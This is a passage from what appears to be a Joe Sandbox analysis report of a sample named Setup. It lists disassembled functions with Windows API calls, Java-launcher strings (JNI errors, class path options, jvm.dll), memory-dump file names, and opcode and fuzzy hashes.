                                                                                                                                                                                                            • Opcode Fuzzy Hash: c9f113a99d199f25bf34a784e1bde5df4a05aedc6fa0d44eeea2a721a9ada148
                                                                                                                                                                                                            • Instruction Fuzzy Hash: E1415171A09742E5FA15BF13E4C0A78A762AF89790FF84139D90E43795DF3CE404C620
                                                                                                                                                                                                            Function 00007FF764A128B4 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 79COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: wprintf$FrequencyPerformanceQuery
                                                                                                                                                                                                            • String ID: %ld micro seconds to load main class$(ZILjava/lang/String;)Ljava/lang/Class;$----%s----$Error: A JNI error has occurred, please check your installation and try again$_JAVA_LAUNCHER_DEBUG$checkAndLoadMain
                                                                                                                                                                                                            • API String ID: 55271498-1016856437
                                                                                                                                                                                                            • Opcode ID: 9840c571dd651118f10d919033ed642a67e18073eee82866058d84f5acd4c250
                                                                                                                                                                                                            • Instruction ID: 245c281ebb1f4b3ac5e426d73466e82c78bbc10db5b485947ca8a8b6739fcbcc
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9840c571dd651118f10d919033ed642a67e18073eee82866058d84f5acd4c250
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5C317021A09746E1EA02BF17E9809B9E7B4BF45FC4FA84435DD0D57796EE3CE0458320
                                                                                                                                                                                                            Function 00007FF764A16A04 Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 40libraryloaderCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 00007FF764A16AA0: LoadLibraryA.KERNEL32 ref: 00007FF764A16B52
                                                                                                                                                                                                              • Part of subcall function 00007FF764A16AA0: LoadLibraryA.KERNEL32 ref: 00007FF764A16BDC
                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(?,?,00000000,00007FF764A1203F), ref: 00007FF764A16A30
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,?,00000000,00007FF764A1203F), ref: 00007FF764A16A51
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,?,00000000,00007FF764A1203F), ref: 00007FF764A16A64
                                                                                                                                                                                                              • Part of subcall function 00007FF764A16630: MessageBoxA.USER32 ref: 00007FF764A166D2
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: LibraryLoad$AddressProc$Message
                                                                                                                                                                                                            • String ID: Error: can't find JNI interfaces in: %s$Error: loading: %s$JNI_CreateJavaVM$JNI_GetDefaultJavaVMInitArgs$JVM path is %s
                                                                                                                                                                                                            • API String ID: 3101497455-3810690643
                                                                                                                                                                                                            • Opcode ID: 79dd69b648ba644c4b7c2a443ef5768ea848ab1d085a151d6f22225a751374ea
                                                                                                                                                                                                            • Instruction ID: 78589a1c85a23cc18b9915b7e1b94902f29bd613838a3e0a7936a0068248e96b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 79dd69b648ba644c4b7c2a443ef5768ea848ab1d085a151d6f22225a751374ea
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 65012E31A09A52E2EE16AF03F5C0A75A371AF45780FE89032D94E87755EE2CE0548320
                                                                                                                                                                                                            Function 00007FF764A294D4 Relevance: 13.8, APIs: 9, Instructions: 273fileCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type_get_daylight
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1330151763-0
                                                                                                                                                                                                            • Opcode ID: 1799b2f7489431ff5a8b7e6613862bb9637e19e5281c98c62e3c6134856f2460
                                                                                                                                                                                                            • Instruction ID: ce93525ccdadc4a40b437465e5a083fb65424b92aae4021e863aec1c4d148aff
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1799b2f7489431ff5a8b7e6613862bb9637e19e5281c98c62e3c6134856f2460
                                                                                                                                                                                                            • Instruction Fuzzy Hash: EDC1DF36B24A42D6EB10EF6AC580AAD7775FB48B98F641229DE2E97394CF38D011D310
                                                                                                                                                                                                            Function 00007FF764A115FC Relevance: 12.1, APIs: 2, Strings: 6, Instructions: 114COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: sprintf
                                                                                                                                                                                                            • String ID: -Dapplication.home=%s$-Denv.class.path=%s$-Djava.class.path=$;$CLASSPATH$Error: Could not determine application home.
                                                                                                                                                                                                            • API String ID: 590974362-1246759518
                                                                                                                                                                                                            • Opcode ID: 455d70054afd31d29f76bbff17add01c85bfeebe5bcde5f5dcac02a02daf364e
                                                                                                                                                                                                            • Instruction ID: ed79768bdff4797ab1b6a32fc3daa9dbcaa8e09e662e8b793b1cc44c8749b9d4
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 455d70054afd31d29f76bbff17add01c85bfeebe5bcde5f5dcac02a02daf364e
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7F41B161A29642F1F912FF13E5D19F99361AF99780FE84035ED0E47397EE2CE5068720
                                                                                                                                                                                                            Function 00007FF764A29F40 Relevance: 10.8, APIs: 7, Instructions: 291COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                            • Opcode ID: 03835eed2511794ef1806b7f7081e0c12be8bfe6403703d697b9048c26610adb
                                                                                                                                                                                                            • Instruction ID: 658681d362587e0fa08be53f46f583198c543754e9e9d324e24f817ebd7c35c3
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 03835eed2511794ef1806b7f7081e0c12be8bfe6403703d697b9048c26610adb
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 69C1F622A0C786E2E660AF569480ABFF752FB40B90FAC4131DA4D27791DF3DE445E720
                                                                                                                                                                                                            Function 00007FF764A30434 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 202COMMONLIBRARYCODE
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • _invalid_parameter_noinfo.LIBCMT ref: 00007FF764A30476
                                                                                                                                                                                                            • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,strdup,00000002,?,00007FF764A1F6EE,?,?,00000000,00007FF764A1129B), ref: 00007FF764A30534
                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,strdup,00000002,?,00007FF764A1F6EE,?,?,00000000,00007FF764A1129B), ref: 00007FF764A305BE
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                                                                                                                                                                                                            • String ID: strdup
                                                                                                                                                                                                            • API String ID: 2210144848-3162730407
                                                                                                                                                                                                            • Opcode ID: 5f6e868cac8767b8cd00cb556661574c3e77d0b1cf669c8e4ef70b47ba6a9909
                                                                                                                                                                                                            • Instruction ID: a9675df7a68fe2713ec3ed6f86d786f4c2d0769ce9f0a88d1eda135899392009
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5f6e868cac8767b8cd00cb556661574c3e77d0b1cf669c8e4ef70b47ba6a9909
                                                                                                                                                                                                            • Instruction Fuzzy Hash: C981C422E1C602E5F712BF66D4C0ABDA664AB46744FA44131DE0EA379AEF3CA441C330
                                                                                                                                                                                                            Function 00007FF764A1C6B4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,?,?,00007FF764A1C966,?,?,?,00007FF764A1C658,?,?,00000001,00007FF764A1C375), ref: 00007FF764A1C739
                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00007FF764A1C966,?,?,?,00007FF764A1C658,?,?,00000001,00007FF764A1C375), ref: 00007FF764A1C747
                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,?,?,00007FF764A1C966,?,?,?,00007FF764A1C658,?,?,00000001,00007FF764A1C375), ref: 00007FF764A1C771
                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?,?,?,00007FF764A1C966,?,?,?,00007FF764A1C658,?,?,00000001,00007FF764A1C375), ref: 00007FF764A1C7B7
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,?,?,00007FF764A1C966,?,?,?,00007FF764A1C658,?,?,00000001,00007FF764A1C375), ref: 00007FF764A1C7C3
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                            • String ID: api-ms-
                                                                                                                                                                                                            • API String ID: 2559590344-2084034818
                                                                                                                                                                                                            • Opcode ID: c93b9afa9378045dd70fb8ef329fe2978787cf993e8feb7acc1572fb472f35fc
                                                                                                                                                                                                            • Instruction ID: 99f349d9b8305d278a5a4906cdaf71dc0fab84b9e497eeea4e0bec334e1ecc53
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c93b9afa9378045dd70fb8ef329fe2978787cf993e8feb7acc1572fb472f35fc
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D531E765A1AA42E1EE13EF039480E75B3A8FF16BA4FA90535DD2D47744EF7CE4408320
                                                                                                                                                                                                            Function 00007FF764A37C34 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMONLIBRARYCODE
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                            • String ID: CONOUT$
                                                                                                                                                                                                            • API String ID: 3230265001-3130406586
                                                                                                                                                                                                            • Opcode ID: b978a35b7cc1b70b866fd404e3b01f6d9dbae4f0d2cae35a5a8d853d967fe07c
                                                                                                                                                                                                            • Instruction ID: 2a5ea72810d87390c08d396d6a6b346ff10ec7da4ce61e6518a498fa92fbce3c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: b978a35b7cc1b70b866fd404e3b01f6d9dbae4f0d2cae35a5a8d853d967fe07c
                                                                                                                                                                                                            • Instruction Fuzzy Hash: EE118E31A18A41D2F391AF53E984B29A2A4FB88FE4FA04234EA1D87794EF3CD414C750
                                                                                                                                                                                                            Function 00007FF764A1C174 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                            • String ID: csm$f
                                                                                                                                                                                                            • API String ID: 2395640692-629598281
                                                                                                                                                                                                            • Opcode ID: 9d1235d08063fd44caa80003cf1faec46bd67c8aa531a05c929fa3fce195626d
                                                                                                                                                                                                            • Instruction ID: c2ee55cd24b553d6107d81d9ebe7da5f13b8f3b9c4ac1789387b300e662fc172
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9d1235d08063fd44caa80003cf1faec46bd67c8aa531a05c929fa3fce195626d
                                                                                                                                                                                                            • Instruction Fuzzy Hash: A151A632A09602E7DB66EF17E484E79B7A5FB44B88FA08130DE1A47748DF38E941C714
                                                                                                                                                                                                            Function 00007FF764A16114 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 31libraryloaderCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                                                                                                                            • String ID: Error: loading: %s$JVM_FindClassFromBootLoader$jvm.dll
                                                                                                                                                                                                            • API String ID: 1646373207-1240634009
                                                                                                                                                                                                            • Opcode ID: 58e78ba51c2ce9807b3a6983860b8e3d0bcbcf34b458af5ae3e2c417ad45fe21
                                                                                                                                                                                                            • Instruction ID: acdf9bba655b72d18d153fe604c08168c27616b76747d6bc08288100007bf703
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 58e78ba51c2ce9807b3a6983860b8e3d0bcbcf34b458af5ae3e2c417ad45fe21
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 56F01920A0EA02F2FE16AF17F9D0AB89272AF487C0FE45034C84D87365FE6CE444C260
                                                                                                                                                                                                            Function 00007FF764A1FAA4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                            • API String ID: 4061214504-1276376045
                                                                                                                                                                                                            • Opcode ID: e5d9057759f63bdc52e77bb7fb25d867f581dcb33219df1bdb630c50641dc064
                                                                                                                                                                                                            • Instruction ID: 190ad9b91c05aa45221e8cf7591a182879984cfea2dc80744de7ef594bef544e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e5d9057759f63bdc52e77bb7fb25d867f581dcb33219df1bdb630c50641dc064
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 09F05461B19742E1FB566F63E5C5B75A365AF48740FE4143EE50F86164EF2CD488C320
                                                                                                                                                                                                            Function 00007FF764A26CBC Relevance: 7.6, APIs: 5, Instructions: 60threadCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CloseCreateErrorFreeHandleLastLibraryThread_invalid_parameter_noinfo
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2067211477-0
                                                                                                                                                                                                            • Opcode ID: 64698e641f6a83f300df68712df761b31ff8641ecb0b3257fc353e06f2765ece
                                                                                                                                                                                                            • Instruction ID: 37e3031c037cf2310dcddcee9a425a27ca043800f044dc5fa6512eec284a49b4
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 64698e641f6a83f300df68712df761b31ff8641ecb0b3257fc353e06f2765ece
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 59219F25A0AB46E2FE15FF63E4D097AE3A4AF84B80FAC0435DE0D53755DE3CE4009660
                                                                                                                                                                                                            Function 00007FF764A3811C Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _set_statfp
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1156100317-0
                                                                                                                                                                                                            • Opcode ID: 69d38c35bd33e64192705e47d806ebaffe6519085bb8d16871af39b095092657
                                                                                                                                                                                                            • Instruction ID: 756de1076c493a6ad87b86466f8382184a545e43425763dcb422189a150e2691
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 69d38c35bd33e64192705e47d806ebaffe6519085bb8d16871af39b095092657
                                                                                                                                                                                                            • Instruction Fuzzy Hash: EA119B22D1D603A2F6673D56D8C2B75D1D16F543B0EF4063CE66DC62DBEE1C5C404120
                                                                                                                                                                                                            Function 00007FF764A2A8A8 Relevance: 7.5, APIs: 3, Strings: 1, Instructions: 487COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                            • String ID: -
                                                                                                                                                                                                            • API String ID: 3215553584-2547889144
                                                                                                                                                                                                            • Opcode ID: 5d8b498ff22d46dd9de763e561541730bfc51a7d6dba9380d87361669e0e64bf
                                                                                                                                                                                                            • Instruction ID: 3533c1ae01e41215b25531effd31230505f20c184167d6aa0b5b1970389bf77c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5d8b498ff22d46dd9de763e561541730bfc51a7d6dba9380d87361669e0e64bf
                                                                                                                                                                                                            • Instruction Fuzzy Hash: AA12F926F09143E5FB64BE1790D4ABAE297EF50710FEC8132D699632C0DF2CE941A724
                                                                                                                                                                                                            Function 00007FF764A309D0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 212COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
